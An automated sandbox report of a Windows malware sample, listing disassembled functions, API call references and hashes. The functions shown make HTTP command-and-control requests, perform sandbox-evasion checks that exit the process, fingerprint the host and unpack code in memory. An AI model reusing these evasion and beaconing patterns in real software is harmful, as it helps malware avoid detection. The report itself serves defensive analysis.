                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                    • String ID: "$"$------$------$------
                                                                                    • API String ID: 2402878923-2180234286
                                                                                    • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                                                    • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                                                    • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                                                    • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                                                                    Function 00406280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1030 406528-40652d 1010->1030 1013 406348-40634c 1011->1013 1014 4064ff-406503 InternetCloseHandle 1011->1014 1016 40635a 1013->1016 1017 40634e-406358 1013->1017 1014->1010 1019 406364-406392 HttpOpenRequestA 1016->1019 1017->1019 1021 4064f5-4064f9 InternetCloseHandle 1019->1021 1022 406398-40639c 1019->1022 1021->1014 1024 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1022->1024 1025 40639e-4063bf InternetSetOptionA 1022->1025 1027 406407-406427 call 41a740 call 41a800 * 2 1024->1027 1028 40642c-40644b call 418940 1024->1028 1025->1024 1027->1030 1035 4064c9-4064e9 call 41a740 call 41a800 * 2 1028->1035 1036 40644d-406454 1028->1036 1035->1030 1039 406456-406480 InternetReadFile 1036->1039 1040 4064c7-4064ef InternetCloseHandle 1036->1040 1044 406482-406489 1039->1044 1045 40648b 1039->1045 1040->1021 1044->1045 1048 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1044->1048 1045->1040 1048->1039
                                                                                    APIs
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                                                    • StrCmpCA.SHLWAPI(?,02E35CA0), ref: 00406303
                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,02E3AE58,00000000,00000000,00400100,00000000), ref: 00406385
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00406503
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                    • String ID: ERROR$ERROR$GET
                                                                                    • API String ID: 3074848878-2509457195
                                                                                    • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                                                    • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                                                    • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                                                    • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56
                                                                                    Function 004117A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1068 411817-41181a 1067->1068 1069 41199e-4119bd strtok_s 1067->1069 1072 411821-411830 call 41a820 1068->1072 1073 411849-411858 call 41a820 1068->1073 1074 4118ad-4118be StrCmpCA 1068->1074 1075 4118cf-4118e0 StrCmpCA 1068->1075 1076 41198f-411999 call 41a820 1068->1076 1077 4118f1-411902 StrCmpCA 1068->1077 1078 411951-411962 StrCmpCA 1068->1078 1079 411970-411981 StrCmpCA 1068->1079 1080 411913-411924 StrCmpCA 1068->1080 1081 411932-411943 StrCmpCA 1068->1081 1082 411835-411844 call 41a820 1068->1082 1083 41185d-41186e StrCmpCA 1068->1083 1084 41187f-411890 StrCmpCA 1068->1084 1069->1065 1072->1069 1073->1069 1101 4118c0-4118c3 1074->1101 1102 4118ca 1074->1102 1103 4118e2-4118e5 1075->1103 1104 4118ec 1075->1104 1076->1069 1105 411904-411907 1077->1105 1106 41190e 1077->1106 1089 411964-411967 1078->1089 1090 41196e 1078->1090 1092 411983-411986 1079->1092 1093 41198d 1079->1093 1085 411930 1080->1085 1086 411926-411929 1080->1086 1087 411945-411948 1081->1087 1088 41194f 1081->1088 1082->1069 1097 411870-411873 1083->1097 1098 41187a 1083->1098 1099 411892-41189c 1084->1099 1100 41189e-4118a1 1084->1100 1085->1069 1086->1085 1087->1088 1088->1069 1089->1090 1090->1069 1092->1093 1093->1069 1097->1098 1098->1069 1110 4118a8 1099->1110 1100->1110 1101->1102 1102->1069 1103->1104 1104->1069 1105->1106 1106->1069 1110->1069
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcessstrtok_s
                                                                                    • String ID: block
                                                                                    • API String ID: 3407564107-2199623458
                                                                                    • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                                                    • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                                                    • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                                                    • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A
                                                                                    Function 00415510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1155 1160 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1160 1161 4156af-4156b6 1155->1161 1159->1155 1291 415ac3-415ac6 1160->1291 1164 4157da-41585f call 41aad0 StrCmpCA 1161->1164 1165 4156bc-4156c3 1161->1165 1184 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1164->1184 1185 415865-41586c 1164->1185 1169 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1165->1169 1170 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1165->1170 1169->1164 1170->1164 1270 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1170->1270 1184->1291 1191 415872-415879 1185->1191 1192 41598f-415a14 call 41aad0 StrCmpCA 1185->1192 1200 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1191->1200 1201 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1191->1201 1221 415a16-415a21 Sleep 1192->1221 1222 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1192->1222 1200->1192 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1200->1296 1201->1192 1221->1127 1222->1291 1270->1164 1296->1192
                                                                                    APIs
                                                                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E342B0,?,0042110C,?,00000000), ref: 0041A82B
                                                                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                                                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                                                      • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                                                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                                                      • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                                                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                                                                    • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpylstrlen$Sleepstrtok
                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                    • API String ID: 3630751533-2791005934
                                                                                    • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                                                    • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                                                                    • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                                                    • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA
                                                                                    Function 00417500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                                                                    APIs
                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                                                                    • wsprintfA.USER32 ref: 00417640
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                    • String ID: :$C$\
                                                                                    • API String ID: 3790021787-3809124531
                                                                                    • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                                                    • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                                                    • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                                                    • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9
                                                                                    Function 02D1003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1344 2d1003c-2d10047 1345 2d10049 1344->1345 1346 2d1004c-2d10263 call 2d10a3f call 2d10e0f call 2d10d90 VirtualAlloc 1344->1346 1345->1346 1361 2d10265-2d10289 call 2d10a69 1346->1361 1362 2d1028b-2d10292 1346->1362 1366 2d102ce-2d103c2 VirtualProtect call 2d10cce call 2d10ce7 1361->1366 1364 2d102a1-2d102b0 1362->1364 1365 2d102b2-2d102cc 1364->1365 1364->1366 1365->1364 1373 2d103d1-2d103e0 1366->1373 1374 2d103e2-2d10437 call 2d10ce7 1373->1374 1375 2d10439-2d104b8 VirtualFree 1373->1375 1374->1373 1377 2d105f4-2d105fe 1375->1377 1378 2d104be-2d104cd 1375->1378 1381 2d10604-2d1060d 1377->1381 1382 2d1077f-2d10789 1377->1382 1380 2d104d3-2d104dd 1378->1380 1380->1377 1387 2d104e3-2d10505 LoadLibraryA 1380->1387 1381->1382 1383 2d10613-2d10637 1381->1383 1385 2d107a6-2d107b0 1382->1385 1386 2d1078b-2d107a3 1382->1386 1388 2d1063e-2d10648 1383->1388 1389 2d107b6-2d107cb 1385->1389 1390 2d1086e-2d108be LoadLibraryA 1385->1390 1386->1385 1391 2d10517-2d10520 1387->1391 1392 2d10507-2d10515 1387->1392 1388->1382 1395 2d1064e-2d1065a 1388->1395 1393 2d107d2-2d107d5 1389->1393 1400 2d108c7-2d108f9 1390->1400 1394 2d10526-2d10547 1391->1394 1392->1394 1396 2d10824-2d10833 1393->1396 1397 2d107d7-2d107e0 1393->1397 1398 2d1054d-2d10550 1394->1398 1395->1382 1399 2d10660-2d1066a 1395->1399 1406 2d10839-2d1083c 1396->1406 1401 2d107e2 1397->1401 1402 2d107e4-2d10822 1397->1402 1403 2d105e0-2d105ef 1398->1403 1404 2d10556-2d1056b 1398->1404 1405 2d1067a-2d10689 1399->1405 1407 2d10902-2d1091d 1400->1407 1408 2d108fb-2d10901 1400->1408 1401->1396 1402->1393 1403->1380 1409 2d1056d 1404->1409 1410 2d1056f-2d1057a 1404->1410 1411 2d10750-2d1077a 1405->1411 1412 2d1068f-2d106b2 1405->1412 1406->1390 1413 2d1083e-2d10847 1406->1413 1408->1407 1409->1403 1415 2d1059b-2d105bb 1410->1415 1416 2d1057c-2d10599 1410->1416 1411->1388 1417 2d106b4-2d106ed 1412->1417 1418 2d106ef-2d106fc 1412->1418 1419 2d10849 1413->1419 1420 2d1084b-2d1086c 1413->1420 1427 2d105bd-2d105db 1415->1427 1416->1427 1417->1418 1421 2d1074b 1418->1421 1422 2d106fe-2d10748 1418->1422 1419->1390 1420->1406 1421->1405 1422->1421 1427->1398
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02D1024D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: cess$kernel32.dll
                                                                                    • API String ID: 4275171209-1230238691
                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                    • Instruction ID: c7b5f19e3b7f87129c44444ffa352ad939145b48d9a94057073eda1ca933b071
                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                    • Instruction Fuzzy Hash: 46526874A00229DFDB64DF68D984BA8BBB1BF09305F1480D9E94DAB751DB30AE85CF14
                                                                                    Function 004169F0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E08DD0), ref: 004198A1
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E08DE8), ref: 004198BA
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E08E00), ref: 004198D2
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E08D58), ref: 004198EA
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E08D10), ref: 00419903
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E34250), ref: 0041991B
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E026B0), ref: 00419933
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E02850), ref: 0041994C
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E08A70), ref: 00419964
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E358B8), ref: 0041997C
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E35A50), ref: 00419995
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E35840), ref: 004199AD
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E02870), ref: 004199C5
                                                                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02E35858), ref: 004199DE
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                                                      • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                                                      • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                                                      • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                                                      • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                                                      • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                                                      • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                      • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                                                      • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                                                      • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                                                      • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                                                                    • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                                                      • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                                                      • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                                                      • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                                                      • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                                                      • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                                                      • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                                                      • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02E342B0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                                                    • Sleep.KERNEL32(00001770), ref: 00416B04
                                                                                    • CloseHandle.KERNEL32(?,00000000,?,02E342B0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                                                    • ExitProcess.KERNEL32 ref: 00416B22
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3511611419-0
                                                                                    • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                                                    • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                                                                    • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                                                    • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE
                                                                                    Function 004047B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                    Strings
